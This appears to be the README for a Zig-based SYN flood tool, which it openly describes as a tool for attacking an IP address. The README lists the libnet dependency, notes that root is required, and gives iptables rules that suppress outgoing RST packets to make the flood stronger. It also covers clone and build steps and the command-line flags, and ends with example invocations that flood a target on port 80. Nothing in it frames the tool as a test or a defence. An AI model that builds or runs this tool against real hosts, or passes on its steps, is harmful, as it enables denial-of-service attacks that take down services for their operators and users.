Start a SYN flood attack to an ip address.
-
Zig
-
libnet
libnet1-dev
under Debian:apt-get install libnet1-dev
libnet
under macOS:brew install -s libnet
-
Root access for sending a packet.
-
Its recommended to block all RST packets from the source host on the source host.
iptables -I OUTPUT -p tcp --dport 80 --tcp-flags RST RST -j DROP iptables -I OUTPUT -p tcp --dport 80 --tcp-flags RST ACK -j DROP
Download the latest binaries from version 3.
-
Clone:
git clone https://github.com/TheFox/synflood.git
-
In
synflood
directory, make:zig build
Binary file is available as
zig-out/bin/synflood
. -
Done.
synflood [-h|--help] -s <IP> -d <IP> -p <PORT> -c <NUM>
-s
: Source IP address.-d
: Destination IP address.-p
: Destination port.-c
: Number of connections.
Examples:
./synflood -s 192.168.241.31 -d 192.168.1.3 -p 80
./synflood -s 192.168.241.31 -d 192.168.1.3 -p 80 -c 1000